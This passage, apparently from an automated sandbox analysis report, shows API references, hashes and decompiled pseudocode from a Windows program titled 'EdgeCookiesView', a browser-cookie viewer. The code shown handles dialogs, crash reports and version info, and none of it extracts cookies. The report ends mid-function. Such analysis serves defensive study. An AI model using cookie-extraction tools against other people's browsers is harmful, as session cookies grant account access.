                                                                                                                                                        • Part of subcall function 00402DE1: SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
                                                                                                                                                        • Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402F2F
                                                                                                                                                        • Part of subcall function 00402DE1: DeleteDC.GDI32(00000000), ref: 00402F36
                                                                                                                                                      • ImageList_Add.COMCTL32(?,00000000,00000000), ref: 0040A8E0
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040A8E9
                                                                                                                                                      • SendMessageW.USER32(?,00000436,00000000,?), ref: 0040A8FE
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040A919
                                                                                                                                                      • CreateWindowExW.USER32 ref: 0040A940
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 0040A9BA
                                                                                                                                                      • LoadIconW.USER32(00000000,00000066), ref: 0040A9C3
                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9D1
                                                                                                                                                      • memcpy.MSVCRT ref: 0040AA22
                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 0040AA58
                                                                                                                                                      • GetFileAttributesW.KERNEL32(004134E0), ref: 0040AA89
                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,004134E0), ref: 0040AA99
                                                                                                                                                      • wcslen.MSVCRT ref: 0040AAA0
                                                                                                                                                      • wcslen.MSVCRT ref: 0040AAAE
                                                                                                                                                      • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040AB0D
                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040AB45
                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040AB58
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$CreatePixel$ImageMessage$HandleLoadModuleSelectSendWindow$DeleteList_$ColorCompatibleIconMenuwcslen$AttributesFilePathRegisterReplaceShowStatusTempToolbarmemcpy
                                                                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$4A
                                                                                                                                                      • API String ID: 945479791-4224175941
                                                                                                                                                      • Opcode ID: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                      • Instruction ID: ef4bcdae66b01cb0e556df410aa057252edbff8cd3310fcf9c61045b6203d9f2
                                                                                                                                                      • Opcode Fuzzy Hash: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
                                                                                                                                                      • Instruction Fuzzy Hash: 35C1C271640344AFEB21DF64CC89FDA3BA5AF54304F04447AFE48AB2A2C7B59844CB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E004010C7(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                                                                                                      				struct tagPOINT _v12;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t47;
                                                                                                                                                      				struct HBRUSH__* _t56;
                                                                                                                                                      				void* _t61;
                                                                                                                                                      				unsigned int _t63;
                                                                                                                                                      				void* _t68;
                                                                                                                                                      				struct HWND__* _t69;
                                                                                                                                                      				struct HWND__* _t70;
                                                                                                                                                      				void* _t73;
                                                                                                                                                      				unsigned int _t74;
                                                                                                                                                      				struct HWND__* _t76;
                                                                                                                                                      				struct HWND__* _t77;
                                                                                                                                                      				struct HWND__* _t78;
                                                                                                                                                      				struct HWND__* _t79;
                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                      				struct HWND__* _t87;
                                                                                                                                                      				struct HWND__* _t89;
                                                                                                                                                      				struct HWND__* _t90;
                                                                                                                                                      				struct tagPOINT _t96;
                                                                                                                                                      				struct tagPOINT _t98;
                                                                                                                                                      				signed short _t103;
                                                                                                                                                      				void* _t106;
                                                                                                                                                      				void* _t117;
                                                                                                                                                      
                                                                                                                                                      				_t106 = __edx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t47 = _a4 - 0x110;
                                                                                                                                                      				_t117 = __ecx;
                                                                                                                                                      				if(_t47 == 0) {
                                                                                                                                                      					__eflags =  *0x412f50;
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x412f50);
                                                                                                                                                      					} else {
                                                                                                                                                      						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                                                                                                      						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                                                                                                      					}
                                                                                                                                                      					SetWindowTextW( *(_t117 + 0x10), L"EdgeCookiesView");
                                                                                                                                                      					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                                                                                                      					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                                                                                                      					E0040103E(_t117, __eflags);
                                                                                                                                                      					E00405B17(_t106,  *(_t117 + 0x10), 4);
                                                                                                                                                      					goto L30;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t61 = _t47 - 1;
                                                                                                                                                      					if(_t61 == 0) {
                                                                                                                                                      						_t103 = _a8;
                                                                                                                                                      						_t63 = _t103 >> 0x10;
                                                                                                                                                      						__eflags = _t103 - 1;
                                                                                                                                                      						if(_t103 == 1) {
                                                                                                                                                      							L24:
                                                                                                                                                      							__eflags = _t63;
                                                                                                                                                      							if(_t63 != 0) {
                                                                                                                                                      								goto L30;
                                                                                                                                                      							} else {
                                                                                                                                                      								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                                                                                                      								DeleteObject( *(_t117 + 0x43c));
                                                                                                                                                      								goto L8;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							__eflags = _t103 - 2;
                                                                                                                                                      							if(_t103 != 2) {
                                                                                                                                                      								goto L30;
                                                                                                                                                      							} else {
                                                                                                                                                      								goto L24;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t68 = _t61 - 0x27;
                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                      							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                      							__eflags = _a12 - _t69;
                                                                                                                                                      							if(_a12 != _t69) {
                                                                                                                                                      								__eflags =  *0x412fd0;
                                                                                                                                                      								if( *0x412fd0 == 0) {
                                                                                                                                                      									goto L30;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                      									__eflags = _a12 - _t70;
                                                                                                                                                      									if(_a12 != _t70) {
                                                                                                                                                      										goto L30;
                                                                                                                                                      									} else {
                                                                                                                                                      										goto L18;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								L18:
                                                                                                                                                      								SetBkMode(_a8, 1);
                                                                                                                                                      								SetTextColor(_a8, 0xc00000);
                                                                                                                                                      								_t56 = GetSysColorBrush(0xf);
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_t73 = _t68 - 0xc8;
                                                                                                                                                      							if(_t73 == 0) {
                                                                                                                                                      								_t74 = _a12;
                                                                                                                                                      								_t96 = _t74 & 0x0000ffff;
                                                                                                                                                      								_v12.x = _t96;
                                                                                                                                                      								_v12.y = _t74 >> 0x10;
                                                                                                                                                      								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                      								_push(_v12.y);
                                                                                                                                                      								_a8 = _t76;
                                                                                                                                                      								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                                                                                                      								__eflags = _t77 - _a8;
                                                                                                                                                      								if(_t77 != _a8) {
                                                                                                                                                      									__eflags =  *0x412fd0;
                                                                                                                                                      									if( *0x412fd0 == 0) {
                                                                                                                                                      										goto L30;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                      										_push(_v12.y);
                                                                                                                                                      										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                                                                                                      										__eflags = _t79 - _t78;
                                                                                                                                                      										if(_t79 != _t78) {
                                                                                                                                                      											goto L30;
                                                                                                                                                      										} else {
                                                                                                                                                      											goto L13;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								} else {
                                                                                                                                                      									L13:
                                                                                                                                                      									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                                                                                                      									goto L8;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                      									L30:
                                                                                                                                                      									_t56 = 0;
                                                                                                                                                      									__eflags = 0;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t85 = _a12;
                                                                                                                                                      									_t98 = _t85 & 0x0000ffff;
                                                                                                                                                      									_v12.x = _t98;
                                                                                                                                                      									_v12.y = _t85 >> 0x10;
                                                                                                                                                      									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                                                                                                      									_push(_v12.y);
                                                                                                                                                      									_a8 = _t87;
                                                                                                                                                      									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                                                                                                      										__eflags =  *0x412fd0;
                                                                                                                                                      										if( *0x412fd0 == 0) {
                                                                                                                                                      											goto L30;
                                                                                                                                                      										} else {
                                                                                                                                                      											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                                                                                                      											_push(_v12.y);
                                                                                                                                                      											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                                                                                                      											__eflags = _t90 - _t89;
                                                                                                                                                      											if(_t90 != _t89) {
                                                                                                                                                      												goto L30;
                                                                                                                                                      											} else {
                                                                                                                                                      												_push(0x412fd0);
                                                                                                                                                      												goto L7;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									} else {
                                                                                                                                                      										_push(_t117 + 0x23e);
                                                                                                                                                      										L7:
                                                                                                                                                      										_push( *(_t117 + 0x10));
                                                                                                                                                      										E00405CD2();
                                                                                                                                                      										L8:
                                                                                                                                                      										_t56 = 1;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t56;
                                                                                                                                                      			}

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                      • String ID: EdgeCookiesView
                                                                                                                                                      • API String ID: 829165378-2656830938
                                                                                                                                                      • Opcode ID: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
                                                                                                                                                      • Instruction ID: d9b36552e8d9c1158f8869abb926452dfc915059135fe28c0a7548d8f12e7aa6
                                                                                                                                                      • Opcode Fuzzy Hash: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
                                                                                                                                                      • Instruction Fuzzy Hash: 87515A31500308EBEB31AF60DD44AAE7BB5FB44301F104A3AF951B69F0C778AD59AB08
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 45%
                                                                                                                                                      			E0040C0C7(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                                                                                                      				void _v259;
                                                                                                                                                      				void _v260;
                                                                                                                                                      				void _v515;
                                                                                                                                                      				void _v516;
                                                                                                                                                      				char _v1048;
                                                                                                                                                      				void _v1052;
                                                                                                                                                      				void _v1056;
                                                                                                                                                      				void _v1560;
                                                                                                                                                      				long _v1580;
                                                                                                                                                      				void _v3626;
                                                                                                                                                      				char _v3628;
                                                                                                                                                      				void _v5674;
                                                                                                                                                      				char _v5676;
                                                                                                                                                      				void _v9770;
                                                                                                                                                      				short _v9772;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      				void* _t60;
                                                                                                                                                      				int _t61;
                                                                                                                                                      				int _t63;
                                                                                                                                                      				int _t64;
                                                                                                                                                      				long _t68;
                                                                                                                                                      				struct HWND__* _t94;
                                                                                                                                                      				signed int _t103;
                                                                                                                                                      				intOrPtr _t127;
                                                                                                                                                      				unsigned int _t130;
                                                                                                                                                      				void* _t132;
                                                                                                                                                      				void* _t135;
                                                                                                                                                      
                                                                                                                                                      				E0040E340(0x2628, __ecx);
                                                                                                                                                      				_t45 = _a8 - 0x110;
                                                                                                                                                      				if(_t45 == 0) {
                                                                                                                                                      					E00405B17(__edx, _a4, 4);
                                                                                                                                                      					_v9772 = 0;
                                                                                                                                                      					memset( &_v9770, 0, 0xffe);
                                                                                                                                                      					_t103 = 5;
                                                                                                                                                      					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                                                                      					memset( &_v1560, 0, 0x1f6);
                                                                                                                                                      					_v260 = 0;
                                                                                                                                                      					memset( &_v259, 0, 0xff);
                                                                                                                                                      					_v516 = 0;
                                                                                                                                                      					memset( &_v515, 0, 0xff);
                                                                                                                                                      					_v5676 = 0;
                                                                                                                                                      					memset( &_v5674, 0, 0x7fe);
                                                                                                                                                      					_v3628 = 0;
                                                                                                                                                      					memset( &_v3626, 0, 0x7fe);
                                                                                                                                                      					_t135 = _t132 + 0x5c;
                                                                                                                                                      					_t60 = GetCurrentProcess();
                                                                                                                                                      					_t105 =  &_v260;
                                                                                                                                                      					_a8 = _t60;
                                                                                                                                                      					_t61 = ReadProcessMemory(_t60,  *0x41245c,  &_v260, 0x80, 0);
                                                                                                                                                      					__eflags = _t61;
                                                                                                                                                      					if(_t61 != 0) {
                                                                                                                                                      						E00405D33( &_v5676,  &_v260, 4);
                                                                                                                                                      						_pop(_t105);
                                                                                                                                                      					}
                                                                                                                                                      					_t63 = ReadProcessMemory(_a8,  *0x412450,  &_v516, 0x80, 0);
                                                                                                                                                      					__eflags = _t63;
                                                                                                                                                      					if(_t63 != 0) {
                                                                                                                                                      						E00405D33( &_v3628,  &_v516, 0);
                                                                                                                                                      						_pop(_t105);
                                                                                                                                                      					}
                                                                                                                                                      					_t64 = E0040591F();
                                                                                                                                                      					__eflags = _t64;
                                                                                                                                                      					if(_t64 == 0) {
                                                                                                                                                      						E0040C9D6();
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040CA5A();
                                                                                                                                                      					}
                                                                                                                                                      					__eflags =  *0x41325c; // 0x0
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						L17:
                                                                                                                                                      						_v1056 = 0;
                                                                                                                                                      						memset( &_v1052, 0, 0x218);
                                                                                                                                                      						_t127 =  *0x412674; // 0x0
                                                                                                                                                      						_t135 = _t135 + 0xc;
                                                                                                                                                      						_t68 = GetCurrentProcessId();
                                                                                                                                                      						_push(_t127);
                                                                                                                                                      						_push(_t68);
                                                                                                                                                      						 *0x4128ec = 0;
                                                                                                                                                      						E0040CBD8(_t105, __eflags);
                                                                                                                                                      						__eflags =  *0x4128ec; // 0x0
                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                      							memcpy( &_v1056, 0x4128f0, 0x21c);
                                                                                                                                                      							_t135 = _t135 + 0xc;
                                                                                                                                                      							__eflags =  *0x4128ec; // 0x0
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								wcscpy( &_v1580, E00405888( &_v1048));
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L20;
                                                                                                                                                      					} else {
                                                                                                                                                      						__eflags =  *0x413260; // 0x0
                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                      							L20:
                                                                                                                                                      							_push( &_v3628);
                                                                                                                                                      							_push( &_v5676);
                                                                                                                                                      							_push( *0x412450);
                                                                                                                                                      							_push( *0x41245c);
                                                                                                                                                      							_push( *0x41244c);
                                                                                                                                                      							_push( *0x412434);
                                                                                                                                                      							_push( *0x412438);
                                                                                                                                                      							_push( *0x412440);
                                                                                                                                                      							_push( *0x412444);
                                                                                                                                                      							_push( *0x41243c);
                                                                                                                                                      							_push( *0x412448);
                                                                                                                                                      							_push( &_v1580);
                                                                                                                                                      							_push( *0x412674);
                                                                                                                                                      							_push( *0x412668);
                                                                                                                                                      							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                                                                      							_push(0x800);
                                                                                                                                                      							_push( &_v9772);
                                                                                                                                                      							L0040DFD6();
                                                                                                                                                      							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                                                                      							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                                                                      							L21:
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						goto L17;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_t45 == 1) {
                                                                                                                                                      					_t130 = _a12;
                                                                                                                                                      					if(_t130 >> 0x10 == 0) {
                                                                                                                                                      						if(_t130 == 3) {
                                                                                                                                                      							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                                                                      							_a4 = _t94;
                                                                                                                                                      							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                                                                      							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                                                                      							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				goto L21;
                                                                                                                                                      			}































                                                                                                                                                      0x0040c2f8
                                                                                                                                                      0x0040c30d
                                                                                                                                                      0x0040c313
                                                                                                                                                      0x0040c2f8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c293
                                                                                                                                                      0x0040c293
                                                                                                                                                      0x0040c299
                                                                                                                                                      0x0040c314
                                                                                                                                                      0x0040c31a
                                                                                                                                                      0x0040c321
                                                                                                                                                      0x0040c322
                                                                                                                                                      0x0040c32e
                                                                                                                                                      0x0040c334
                                                                                                                                                      0x0040c33a
                                                                                                                                                      0x0040c340
                                                                                                                                                      0x0040c346
                                                                                                                                                      0x0040c34c
                                                                                                                                                      0x0040c352
                                                                                                                                                      0x0040c358
                                                                                                                                                      0x0040c35e
                                                                                                                                                      0x0040c35f
                                                                                                                                                      0x0040c36b
                                                                                                                                                      0x0040c371
                                                                                                                                                      0x0040c376
                                                                                                                                                      0x0040c37b
                                                                                                                                                      0x0040c37c
                                                                                                                                                      0x0040c394
                                                                                                                                                      0x0040c3a5
                                                                                                                                                      0x0040c3ab
                                                                                                                                                      0x0040c3b1
                                                                                                                                                      0x0040c3b1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c299
                                                                                                                                                      0x0040c291
                                                                                                                                                      0x0040c0e2
                                                                                                                                                      0x0040c0e8
                                                                                                                                                      0x0040c0f3
                                                                                                                                                      0x0040c116
                                                                                                                                                      0x0040c124
                                                                                                                                                      0x0040c13f
                                                                                                                                                      0x0040c142
                                                                                                                                                      0x0040c14e
                                                                                                                                                      0x0040c156
                                                                                                                                                      0x0040c156
                                                                                                                                                      0x0040c116
                                                                                                                                                      0x0040c0f3
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040C371
                                                                                                                                                      • {Unknown}, xrefs: 0040C191
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                      • Opcode ID: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                      • Instruction ID: 3431b055b2365f4bc913e86f7a298cdc42a4156783f6a5b9feadd91d66c4c499
                                                                                                                                                      • Opcode Fuzzy Hash: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
                                                                                                                                                      • Instruction Fuzzy Hash: B271A3B2800119EEDB20AF51DD85EDA377CEB08354F0085BAF908F6191DA799E949F68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E0040DE36(intOrPtr* __edi, short* _a4) {
                                                                                                                                                      				int _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				void* _v16;
                                                                                                                                                      				int _v20;
                                                                                                                                                      				long _v60;
                                                                                                                                                      				char _v572;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				int _t47;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      				signed short* _t76;
                                                                                                                                                      				void* _t81;
                                                                                                                                                      				void* _t84;
                                                                                                                                                      				intOrPtr* _t96;
                                                                                                                                                      				int _t97;
                                                                                                                                                      
                                                                                                                                                      				_t96 = __edi;
                                                                                                                                                      				_t97 = 0;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                                                                      				_v8 = _t47;
                                                                                                                                                      				if(_t47 > 0) {
                                                                                                                                                      					_t50 = E0040674D(__edi);
                                                                                                                                                      					_push(_v8);
                                                                                                                                                      					L0040E038();
                                                                                                                                                      					_t84 = _t50;
                                                                                                                                                      					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                                                                      					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                                                                      						_t81 = _v12;
                                                                                                                                                      						_t11 = _t81 + 0x30; // 0x6cdfe853
                                                                                                                                                      						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                                                                      						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                                                                      						 *__edi =  *_t13;
                                                                                                                                                      						_t14 = _t81 + 0x14; // 0x5900006c
                                                                                                                                                      						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                                                                      						_t16 = _t81 + 0x10; // 0xfee850ff
                                                                                                                                                      						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                                                                      						_t18 = _t81 + 0x24; // 0x38680000
                                                                                                                                                      						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                                                                      						_t20 = _t81 + 0x28; // 0xbb0040fa
                                                                                                                                                      						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                                                                      					}
                                                                                                                                                      					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                                                                      						L5:
                                                                                                                                                      						wcscpy( &_v60, L"040904E4");
                                                                                                                                                      					} else {
                                                                                                                                                      						_t76 = _v16;
                                                                                                                                                      						_push(_t76[1] & 0x0000ffff);
                                                                                                                                                      						_push( *_t76 & 0x0000ffff);
                                                                                                                                                      						_push(L"%4.4X%4.4X");
                                                                                                                                                      						_push(0x14);
                                                                                                                                                      						_push( &_v60);
                                                                                                                                                      						L0040DFD6();
                                                                                                                                                      						if(E0040DDA7( &_v572, _t84,  &_v60, 0x40f454) == 0) {
                                                                                                                                                      							goto L5;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					E0040DDA7(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                                                                      					E0040DDA7(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                                                                      					E0040DDA7(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                                                                      					E0040DDA7(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                                                                      					E0040DDA7(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                                                                      					E0040DDA7(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                                                                      					E0040DDA7(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                                                                      					E0040DDA7(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                                                                      					_push(_t84);
                                                                                                                                                      					_t97 = 1;
                                                                                                                                                      					L0040E032();
                                                                                                                                                      				}
                                                                                                                                                      				return _t97;
                                                                                                                                                      			}

                                                                                                                                                      0x0040df64
                                                                                                                                                      0x0040df79
                                                                                                                                                      0x0040df8e
                                                                                                                                                      0x0040dfa3
                                                                                                                                                      0x0040dfb8
                                                                                                                                                      0x0040dfbf
                                                                                                                                                      0x0040dfc0
                                                                                                                                                      0x0040dfc1
                                                                                                                                                      0x0040dfc7
                                                                                                                                                      0x0040dfcc

                                                                                                                                                      APIs
                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
                                                                                                                                                      • GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
                                                                                                                                                      • VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
                                                                                                                                                      • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040DEE7
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DF11
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040DFC1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                      • API String ID: 1223191525-1542517562
                                                                                                                                                      • Opcode ID: e3c1c2c435bed2f941286cbfa00b0d5ce1b97d62a5a92108709d5ab5f08d6fec
                                                                                                                                                      • Instruction ID: 259d72124e724de92b6e9870ccb5e43e5a0f9d392629a35824c20b6fa1ecb0e7
                                                                                                                                                      • Opcode Fuzzy Hash: e3c1c2c435bed2f941286cbfa00b0d5ce1b97d62a5a92108709d5ab5f08d6fec
                                                                                                                                                      • Instruction Fuzzy Hash: FB4135B2900219BEC704EBE5DC41DDEB7BCAF48304F504567B505B3181DB78AA99CBE8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                                      			E004099C4(void* __eax) {
                                                                                                                                                      				struct _SHFILEINFOW _v692;
                                                                                                                                                      				void _v1214;
                                                                                                                                                      				short _v1216;
                                                                                                                                                      				void* _v1244;
                                                                                                                                                      				void* _v1248;
                                                                                                                                                      				void* _v1252;
